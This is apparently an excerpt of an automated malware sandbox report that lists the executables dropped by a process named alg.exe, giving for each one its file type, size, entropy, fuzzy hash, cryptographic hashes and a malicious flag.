                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.59597034663094
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:2b+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKI7wRGpj3:AnPgTHIwZoRBk9DdhSUEVIXgKUF9
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:08E0D317269DB761921BD9568158C2D9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:A8E8ED562C823E44B3C7717FECC448A5E3A9E778
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:E42091E6F0958580E4C298CACBDA11988B3782F0CF701421C3E5D4F95C1E4828
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FF2D8CB24BF09B3AA66BBFE5B8E474D7A577D7AB6CA379A7C4A4290348507C4F47FFE10FD0326E5699B9A3406427507553FEF52105C54A0A2F285DF2E59BD066
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1478144
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.829898600087479
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Bg5FvCPWs4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:WfFzLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:5BACADC2EC3ECD7469B65406BA8F6F42
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:A799017C6AF12944D3E11F9BE2D1B3838C6744C9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:B32D5130F19CD37EFA63AFD8C8DAD5B3352990F27564ABA5DF391CB1FF242301
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:F7D6FB684E8BBB7C20F8D3332A96F96F8142736002D2E70F8160EC9A19B8204A8D59FE1924D1AE8EDB6A8059AEADF8488886CA4FA2C7AA94E55AA082AF26CB52
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.202739011020617
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:JjKTIsAjFuvtIfmFthMaT5U8aChaeuC/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:JjIMmPh7TT79bLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:13FE6BD3AF6DFDF966E1E5DC3AB18C8A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:6346C3F5840A222506BAE47C3148746EDC3387E0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:AAFDCA71B9C22B75EB7448B7FCB34FD3A50F3C2970BFE0BEB228C58C53413325
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:DD52CC84506A778CDB80A21EFA34EC24F7F48B5FDAA94323295F41A78BD8F4C966D225992FBA438D6D0B0BB937F0A86760B064265227627B3C40FAFB63D68E9C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1671168
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.008260407773543
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:NGqVwCto1em5Wg+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8Z1emUNLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:670B3D50F9769D9D53204A7D55204DA6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:F4EBD72D48271B827ABADE7BF2302FDD6E010E7F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0E75045709EFCA21BD5500ECD2A5FCF110C0B23A5FE98220D66C3D27098D7004
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:E373EE80DD965026453BFFF737EAC161F6477CA67BA8331D393E969ACBD8A7BAE0B5A50E1C5FBA43C091FD1011BBD3BD9ECD34CB556080716526B2716A69741A
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1409024
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.690541947425694
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:eWBWf/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:iLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:14E0F7D4A72677ACA197DBE8B9E404B9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5A05D9C7B47654569CB10C254C670634289D53CF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:3681B1543CD7704837321350256B7BFF6A57A02EB02E9509D0DB8B8807CA93DE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:2897FDF5823CA45811B856B9D21B76A8248F7D72C4A93799BF2F1B3B2B3942C55E97F1837D2249BB76241615090000933CB52CDD057C13ED565AE26F9AA6951D
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.223535384881754
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:5+GtCi27mVTyT+a0BLNiXicJFFRGNzj3:Mmd27e7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:473734991AA8E4905C68350FC1ADD5AC
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:2104C5F739B7C8CFF9716558153BD32B7917DEE1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:02B88C864A5A879E0F70447D1080ABA097CB2EDC6571689AD69FED4958C5BB4E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:6EDBB0BFDB09E799C9648902EDF5F6FA2CA6D4F0849671E8434C029C4437CDD042D981447C44A42AF2DE4A1BAB92778ADAE35D65951305EF0058075F2D1086D2
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.648200500413914
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:IU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYmLNiXicJFFRGNzj3:52NfHOIK5Ns6qR907wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:6F78A72037A3069E24192555FE805766
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:9BEFE9EA182B542FEB797F325904F084F4AC06B2
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:870CE0B28BEAB9DE779F4B608965EF96A42CFC73D985D263CDFA0FA7D58BD4BD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:031CF6CA37BE85D0C05A9D99437E781F481E41C90E94F00BCD7AEEB9B5C64A5DFD1247588F0E9AAC74187F2F1AD81104708D3318DD29A31091E65E58462B2545
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1743872
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.139931790270903
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:ZkDWTUQcydO/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ZqKUZLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:7B857ED7E2166F84A9000B9087DA9C1D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:6A61E185FB94E1197AEC0AE68688BCC2CB8A7522
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:F70D22720DD41FE684DAD3E274625916BE925451571BF0AF0DBA19E3FC675D77
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:80A106E6D59681AB062755B0A00C36D4AEB021A6D27F6269F8153571C60713C71CA1BEB44E13651C78773713929D932E9564F01303931FAA25C3A3FC033650F3
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1494016
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.901008572601023
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:eI+qBx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:L+SLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:F4B79993364BE4F0525964F460EE5D88
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:E137F2330F6BD7FF5AD7F26279FB5DF3BCD228BB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:E10718A58328F837EAAE4D072C21001CF66555BD162E8533D1147F5F6577ECC9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:EA79A264A5ECC439E86BF96D467D1B3BFF694F0F9B3763BDDDAAA8878E1AA0EA2CED44F507139C63FF52E64B4279080F0A26F72B65605822BE44C59D3081E3BF
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1298944
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.525825875063929
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:qiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:s/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:3E4031479F673025705F980C5DD9F3D8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:7192F1FF8F2FCFF818445A9B9900E19AAFCFE2BE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:8A8DFB04BD2ADFC85286BAB214AA037DE65DA100F9B4FCE3D8051048EC17D655
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:BBCEE3A4248017A1B64F60B88FD8897B38637EAF7375236953B7CF187C19F7C67259689D1801EFA9414CFB82455DC90915C2F372FF8543E6E78A72A39A5A60C8
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1317376
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.555420510983085
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:2JiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:y/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:274DDCE1829DB23C4D64A8810C5941CB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:C3BD3A5C03C4A2765A439DB19D6F7E46D340C8EF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:F82F5B4011E36C8392AA43310450579B336FAACD80824636256254B786FF4149
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FB0227D05CFDE9968DA83A73DD534505F7C75D9921AFD63B19A1101E4F544F723B1F9D00F29B75969662042663817853E092640E4FA02097B6492B60A89BA212
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.497765617649596
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:2tuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN7554LNiXico:2jEIa4HIEWOc5G7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:3AC72B66223ED56AD2D6CDEDDE066F6D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:37E917C8E203F4D89DD79333FD7C16655C99C4C3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:753A020E70A1EEB12F88897C1C72F7580EA89EDBDA280B3D7B4464E06B9F1518
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:6D28AAE84991CE0BDE7442F90FBFCCBDBF960CC8EE6EDCB623CDD5F75EFEA20B0F00C6F60CF217069680A3CC3274663D65ECE557B0B2A054A8CF39112873EA6D
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999360394541404
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:1572864:9Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:2XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:9AEBD32321C41E2F3FE9AF0B315E93D5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:F13BA1B646BD39E1D0B736E84A96968737A78398
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:56FA9ED63CF4D40BF4E54AEDE3995F59162BE5A79A6C50B0FEE2B8ED11FB23CE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:6C09DF6B3836C122B2144B2995452788A45EF61C16A30A999625962037317760D6CE66E19DD5155F35836A14A7E92667915BEDA3A9542DF1695EC288506DD625
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1385984
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.70880989819714
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:1jkYz9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9/z9LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:67496FDEB1D3C5E27FA51D1737FE7329
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:126E307A354650EAF22C7EB00BA2C235BBEDC581
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:EF06E54C755308F12D5E41EBB6974A14EAA455DD84223FE84C824E5BEE288466
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:43BA25A09972F90438AD9E723E9243BDC0340099D74E7262891C61E2B1010ED7284E86B170883FF9B24906A09BBE0ED638E294C91842AE70A7948F1B9B28F32F
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1540608
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.93863340586214
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:exwSJikrmZsJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:eylkrKsJLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:7D832709D2BA5488C956B9EA7393820B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:61269781C1F8B98C33471B6316E8B2FDEF9216B0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:A06EE229D3C5506FBE491F46EA334111AFB632A7297BD9123DF99DFED96162A5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:A688E71092AB4EBD18B346A6B7A35E669982D7FF46F86BC488E61FC6641A016E6B7786BE1754348BEDD55903E62C1EF24BF0BA3409508DDF96EBA49A97D2DA82
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1804800
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2504195085694985
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:PHQJLIRIvsnN8/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:PHQJLP48LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:66B3BA8DD8BAB8BA6B21AC9D5AED3409
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:A631BCEE9EACCA0FCB5EED971E0BF4CA24E086E1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:BA1D97AA979894DFF8AF8FD454EE1A5EE6843B00990D5E83DF6BA791F4DBE0A3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C42407B40A6829A582C3BFC48EE4A01A2596CBC2551390C80201A201FF7A952DAD0F7E3D6C2D24AABDF2EC8BB67D40791E63F0E03002AC287B4735B7352F9895
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.448966181724942
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:tUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kS:KWmXL6DEC7dRpKuDQbgf7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E375770576784898F172D9D60C683198
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:AE8B9DF6F4ADAA42615D6A459721A114D6278B2F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:D7CAEBF521217EA1CC46033A8A7935B0D176419A59E5670C23AB1232FC20511F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:A48F61251F536353D54CA06266A658B74841030E2BB9B43613D1A5EF1A0EFD80FA91CF0B6B5D6F7F7619E5A3F1593C9C582B86D75D2DF25BFE759920E5A93F5C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.971965142657942
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:brZ23AbsK6Ro022JjL2WEiVqJZY7wRGpj3:/JADmmxL2WEoCZEF9
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D42F3201E43699D6DDD4EEFF737A821E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:B4A49089548CD9452C651FF12C05B61DCDD57141
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:AC770DC461369936C647A41468AE57A01835229835ED5A583925CCC5887CE457
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:62048E2616C12C6DF10A11686EA963A4C765E3248B0B44087D1C715FD90AE711262770E53EB70D2137C67827CDA43F46D9CF39BE3BA75AA020E97C13EE1D5F9E
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.197657696809315
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:EfrYY42wd7hlOw9fpkEE645/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5z9xrS5LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:F03ED49D780ECDAA818B9B92688EC935
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:94B2D07F1B820EEADF52B220A01A9D4868E0874D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:4A1BF388F83223F40A4B1B39A33B2A31B4B02828F3749CEA2DDBFB22497F4760
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:473FE179F672E2D49A349F0F99EA73310EDBDE70C4A32E9F3B19A51816C4EE0E14BCC292847B7A843B7D4E131D868906F6F2D055EF189102DAD846B2E6E7B578
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1544192
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.839830544538881
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:yzNKUc5G/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yzNrc5GLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:C2CFA0C01D5B6CD9670488AB08B87E23
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:4611B4D9FA6BADBADECBCD4653D1BB6C3F11EFC9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:C1C8EFB7C4CA5A576DECA87FDFE2D5D31B04B3F3F967192D5FD3896F15CBECE9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:B86EB306C04C4437E5C1AC1376B3710090804B92377553ECD73651BEFA4DAB4FC01687C501430505820CEDF2145055EEAB9FC8D67FB41C79A22B0DF53DE26890
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.572805229111452
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:TALuzDKnxCp3JKNrPJzruaI6HMaJTtGbr7wRGpj3:EaGg3cFPIaI6HMaJTtGbPF9
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:27D118A9FB31DE745BCAE88165F4ECE7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:F1F5D3750AABA184EE292C5B4DD8E592E19D6171
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:8BDFC163BD1C5BBDD4EC86B62850A2213D564342B1935B584DFF5214619CD3D2
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:B4B60C0B4E479756E44A6B44485E58E67D103828471C9883D33E2FD4CB241DE35A639FA3FB6C304A5D6790A24E53FDA8384FFD2125472CF861279C3A7C55D855
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1468416
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.895093306283645
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:fXr/SV0xWV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DNxYLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:311BD86CCAEA70727DB7E4D9475A1154
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:30E7E6948EB6C61C6B1E069122E3DE20A527A398
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:C1EC2AD1C65CD542FE1CA96317784BDCD7D6518096A4661A3014ED8119E6E9D5
